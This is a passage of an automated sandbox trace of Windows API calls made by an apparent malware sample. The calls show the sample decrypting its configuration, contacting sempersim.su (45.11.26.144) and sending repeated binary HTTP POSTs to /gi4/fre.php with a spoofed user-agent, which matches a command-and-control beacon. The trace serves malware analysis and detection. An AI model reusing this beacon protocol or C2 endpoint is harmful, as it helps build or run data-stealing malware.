dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0202.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0202.227] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0202.227] GetProcessHeap () returned 0x5b0000 [0202.227] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0202.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0202.228] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3038, pdwDataLen=0xdfcfc | out: pbData=0x5d3038, pdwDataLen=0xdfcfc) returned 1 [0202.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0202.229] CryptDestroyKey (hKey=0x5bde08) returned 1 [0202.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0202.230] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0202.230] GetProcessHeap () returned 0x5b0000 [0202.230] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5298 [0202.231] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0202.231] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0202.232] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0202.232] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0202.234] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0202.234] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0202.234] GetProcessHeap () returned 0x5b0000 [0202.234] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0202.234] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdcf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf308*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0202.239] GetProcessHeap () returned 0x5b0000 [0202.239] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca900 [0202.239] socket (af=2, type=1, protocol=6) returned 0x30c [0202.239] connect (s=0x30c, name=0x5cf308*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0202.312] FreeAddrInfoW (pAddrInfo=0x5cdcf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf308*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0202.312] GetProcessHeap () returned 0x5b0000 [0202.312] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5888 [0202.312] GetProcessHeap () returned 0x5b0000 [0202.312] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0202.313] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0202.314] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0202.314] GetProcessHeap () returned 0x5b0000 [0202.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0202.314] GetProcessHeap () returned 0x5b0000 [0202.315] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0202.315] GetProcessHeap () returned 0x5b0000 [0202.315] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2ff0 [0202.315] GetProcessHeap () returned 0x5b0000 [0202.315] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0202.316] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0202.316] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0202.316] GetProcessHeap () returned 0x5b0000 [0202.316] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0202.316] GetProcessHeap () returned 0x5b0000 [0202.317] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0202.317] send (s=0x30c, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0202.318] send (s=0x30c, buf=0x5d1e18*, len=159, flags=0) returned 159 [0202.318] GetProcessHeap () returned 0x5b0000 [0202.318] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0202.318] recv (in: s=0x30c, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0203.809] GetProcessHeap () returned 0x5b0000 [0203.810] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0203.810] GetProcessHeap () returned 0x5b0000 [0203.810] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2ff0 | out: hHeap=0x5b0000) returned 1 [0203.810] GetProcessHeap () returned 0x5b0000 [0203.810] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0203.811] GetProcessHeap () returned 0x5b0000 [0203.811] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5888 | out: hHeap=0x5b0000) returned 1 [0203.811] closesocket (s=0x30c) returned 0 [0203.812] GetProcessHeap () returned 0x5b0000 [0203.812] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca900 | out: hHeap=0x5b0000) returned 1 [0203.812] GetProcessHeap () returned 0x5b0000 [0203.812] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5298 | out: hHeap=0x5b0000) returned 1 [0203.812] GetProcessHeap () returned 0x5b0000 [0203.813] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3038 | out: hHeap=0x5b0000) returned 1 [0203.813] GetProcessHeap () returned 0x5b0000 [0203.813] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0203.813] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x11ec) returned 0x30c [0203.815] Sleep (dwMilliseconds=0xea60) [0203.827] GetProcessHeap () returned 0x5b0000 [0203.827] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2ff0 [0203.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0203.828] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0203.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0203.835] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0203.899] GetProcessHeap () returned 0x5b0000 [0203.899] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8590 [0203.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0203.900] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8590, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0203.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0203.901] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0203.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0203.902] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0203.902] GetProcessHeap () returned 0x5b0000 [0203.902] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8590 | out: hHeap=0x5b0000) returned 1 [0203.903] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0203.903] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2ff0, pdwDataLen=0xdfcfc | out: pbData=0x5d2ff0, pdwDataLen=0xdfcfc) returned 1 [0203.904] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0203.904] CryptDestroyKey (hKey=0x5be048) returned 1 [0203.905] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0204.006] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0204.006] GetProcessHeap () returned 0x5b0000 [0204.006] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0204.007] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0204.007] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0204.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0204.008] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0204.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0204.009] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0204.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0204.010] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0204.010] GetProcessHeap () returned 0x5b0000 [0204.010] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0204.010] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0204.010] GetProcessHeap () returned 0x5b0000 [0204.011] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0204.011] GetProcessHeap () returned 0x5b0000 [0204.011] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0204.011] GetProcessHeap () returned 0x5b0000 [0204.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2ff0 | out: hHeap=0x5b0000) returned 1 [0204.012] GetProcessHeap () returned 0x5b0000 [0204.012] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e40 [0204.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0204.013] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0204.020] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0204.020] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0204.031] GetProcessHeap () returned 0x5b0000 [0204.031] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0204.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0204.032] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0204.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0204.033] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0204.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0204.034] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0204.034] GetProcessHeap () returned 0x5b0000 [0204.035] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0204.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0204.036] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e40, pdwDataLen=0xdfcfc | out: pbData=0x5d2e40, pdwDataLen=0xdfcfc) returned 1 [0204.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0204.037] CryptDestroyKey (hKey=0x5be288) returned 1 [0204.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0204.038] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0204.038] GetProcessHeap () returned 0x5b0000 [0204.038] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0204.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0204.039] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0204.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0204.040] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0204.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0204.041] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0204.041] GetProcessHeap () returned 0x5b0000 [0204.041] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0204.041] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cde08*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0204.163] GetProcessHeap () returned 0x5b0000 [0204.163] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca990 [0204.163] socket (af=2, type=1, protocol=6) returned 0x310 [0204.163] connect (s=0x310, name=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0204.234] FreeAddrInfoW (pAddrInfo=0x5cde08*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0204.234] GetProcessHeap () returned 0x5b0000 [0204.234] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5a20 [0204.234] GetProcessHeap () returned 0x5b0000 [0204.234] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0204.235] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0204.235] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0204.235] GetProcessHeap () returned 0x5b0000 [0204.235] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0204.236] GetProcessHeap () returned 0x5b0000 [0204.236] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0204.236] GetProcessHeap () returned 0x5b0000 [0204.236] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2fa8 [0204.236] GetProcessHeap () returned 0x5b0000 [0204.236] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0204.237] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0204.238] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0204.238] GetProcessHeap () returned 0x5b0000 [0204.238] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0204.238] GetProcessHeap () returned 0x5b0000 [0204.239] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0204.239] send (s=0x310, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0204.241] send (s=0x310, buf=0x5d1e18*, len=159, flags=0) returned 159 [0204.241] GetProcessHeap () returned 0x5b0000 [0204.241] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0204.241] recv (in: s=0x310, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0205.764] GetProcessHeap () returned 0x5b0000 [0205.764] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0205.764] GetProcessHeap () returned 0x5b0000 [0205.765] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2fa8 | out: hHeap=0x5b0000) returned 1 [0205.765] GetProcessHeap () returned 0x5b0000 [0205.765] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0205.765] GetProcessHeap () returned 0x5b0000 [0205.765] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5a20 | out: hHeap=0x5b0000) returned 1 [0205.765] closesocket (s=0x310) returned 0 [0205.766] GetProcessHeap () returned 0x5b0000 [0205.766] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca990 | out: hHeap=0x5b0000) returned 1 [0205.766] GetProcessHeap () returned 0x5b0000 [0205.766] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0205.766] GetProcessHeap () returned 0x5b0000 [0205.767] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0205.767] GetProcessHeap () returned 0x5b0000 [0205.767] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0205.768] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x1270) returned 0x310 [0205.769] Sleep (dwMilliseconds=0xea60) [0205.783] GetProcessHeap () returned 0x5b0000 [0205.783] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3668 [0205.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0205.784] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0205.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0205.791] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5a20) returned 1 [0205.801] GetProcessHeap () returned 0x5b0000 [0205.801] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0205.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0205.802] CryptImportKey (in: hProv=0x5c5a20, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0205.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0205.803] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0205.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0205.804] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0205.804] GetProcessHeap () returned 0x5b0000 [0205.805] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0205.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0205.806] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3668, pdwDataLen=0xdfcfc | out: pbData=0x5d3668, pdwDataLen=0xdfcfc) returned 1 [0205.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0205.807] CryptDestroyKey (hKey=0x5be288) returned 1 [0205.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0205.808] CryptReleaseContext (hProv=0x5c5a20, dwFlags=0x0) returned 1 [0205.808] GetProcessHeap () returned 0x5b0000 [0205.808] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0205.808] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0205.809] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0205.809] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0205.810] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0205.810] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0205.811] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0205.811] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0205.815] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0205.815] GetProcessHeap () returned 0x5b0000 [0205.815] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb100 [0205.815] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0205.816] GetProcessHeap () returned 0x5b0000 [0205.816] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb100 | out: hHeap=0x5b0000) returned 1 [0205.816] GetProcessHeap () returned 0x5b0000 [0205.816] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0205.816] GetProcessHeap () returned 0x5b0000 [0205.817] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3668 | out: hHeap=0x5b0000) returned 1 [0205.817] GetProcessHeap () returned 0x5b0000 [0205.817] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d34b8 [0205.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0205.818] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0205.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0205.823] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0205.832] GetProcessHeap () returned 0x5b0000 [0205.832] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0205.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0205.833] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0205.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0205.834] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0205.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0205.836] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0205.836] GetProcessHeap () returned 0x5b0000 [0205.836] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0205.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0205.837] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d34b8, pdwDataLen=0xdfcfc | out: pbData=0x5d34b8, pdwDataLen=0xdfcfc) returned 1 [0205.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0205.838] CryptDestroyKey (hKey=0x5be048) returned 1 [0205.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 